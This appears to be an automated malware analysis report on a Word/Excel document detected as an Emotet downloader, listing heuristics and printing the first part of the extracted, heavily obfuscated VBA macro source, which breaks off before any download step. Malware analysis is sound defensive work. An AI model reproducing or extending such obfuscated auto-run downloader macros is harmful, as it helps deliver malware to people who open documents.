MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6863643-0', indicating it is likely part of the Emotet family. Heuristics confirm the presence of VBA macros, including an AutoOpen macro and a GetObject call, which are commonly used to execute malicious code. The VBA script itself is heavily obfuscated, but the presence of these indicators strongly suggests it is designed to download and execute a secondary payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6863643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6863643-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70072 bytes |
SHA-256: 1b60808f170b4570d02b602044d7acf19635d814464341de8a327c6001b9c367 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z_38110"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "b04543"
Function w_71_4_()
G___902 = 463496802 - 300565441
M_67647_ = 275529203 + r7022_6
Select Case t84420
Case 393055823
j26146 = Chr(66268235 * Tan(X7124_))
Y37841 = s0_360_3
Case 728148230
O_341__ = z_46__
o97185 = S20_9_60
Case 237004443
N_7_72 = 750649577
W56770 = H908_8
End Select
j2__70 = 18518068 - 131667192
s8_9_0 = 62015676 + X7__7_96
Select Case w9__11_
Case 497061171
z_09___6 = Chr(488412061 * Tan(f6_2__5))
t4__87 = u813101
Case 672540901
w8_3__ = K__4482
k__16_57 = S90_61
Case 601956749
E052_342 = 857795623
c1__5_ = c990_9
End Select
b3453__ = 104565420 - 775740543
X_4393 = 445355691 + Y___2_65
Select Case Y5_90_
Case 79199700
r__82_ = Chr(941390874 * Tan(T_99_01_))
K769_9 = c4978_38
Case 881299136
p4318_ = t848_6_
W52_0_67 = U_74_888
Case 65364877
v99_835 = 679947712
n95286 = M_842_
End Select
v75_37 = 453532830 - 412301132
U14788_7 = 95796094 + b523053
Select Case l573_93_
Case 953038870
w3473900 = Chr(12276949 * Tan(C1_634))
H43_429 = z5_8857
Case 381220213
w198357 = R87_276
V_6982_0 = Z_5110_7
Case 543573614
U__3_186 = 630158723
l0_235 = o880_01
End Select
q02__62 = 83606640 - 488853547
d12_91 = 143256400 + A_9306
Select Case B9_51_5
Case 683430457
z8__23_ = Chr(796771875 * Tan(b677_6))
G_18481_ = a5_2_733
Case 276270113
W6___193 = k558_77
p44153 = j_58244
Case 700988235
j58707 = 144854371
W8__0_ = W369_89
End Select
s888_31 = 49539378 - 772740888
L13_1440 = 996136666 + u0630712
Select Case v56__62
Case 165732834
F_94_31_ = Chr(634065621 * Tan(k_20_20))
B0145__ = t28__0
Case 74561086
O87474 = Y44157
l7_6_35 = n1___79
Case 728333453
z2_3_32 = 249365808
E80_324 = L2339043
End Select
P44_28_ = 988772114 - 646105999
q_2_32 = 241365347 + o5754_8
Select Case B1577_9
Case 668250859
h273__ = Chr(85106757 * Tan(b90699__))
h2_889__ = S575117
Case 347078999
i39___60 = h___3209
A__1632 = d28_158
Case 562870064
l4228_87 = 706307631
S_790068 = l_4203_
End Select
End Function
Function T__6___(s__083, h562_7_4)
On Error Resume Next
l_8_1_3 = 348603701 - 398410052
s4_662__ = 765062067 + d793_60
Select Case a2_8_062
Case 559876446
G29__6_6 = Chr(142959468 * Tan(Q_4415_1))
D13_667 = u54_57__
Case 470702012
R33__25 = D48_412
S_506_61 = o375835_
Case 835402729
O2_209_8 = 692878783
V_2840 = S_57_6
End Select
P20__23_ = 922571786 - 686756153
a5775934 = 179635042 + i51__6
Select Case z_57_583
Case 927261415
H65___51 = Chr(272938300 * Tan(m8_218_))
S__913 = F_64_46
Case 649192883
N_76_77 = m_517849
m_81__7 = z457_2
Case 470863079
z2431630 = 811410163
l803188_ = a5621876
End Select
M34368 = 572154674 - 867632956
s__2_6 = 598042126 + K_2_9138
Select Case B65_9_9
Case 843314296
H6_6_09 = Chr(853046827 * Tan(I5233725))
J_273_ = I538_80_
Case 14711409
u755_4 = H92043
I564129 = b9898676
Case 338829439
s053686 = 352550132
w6_27797 = t0649309
End Select
Set c____
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.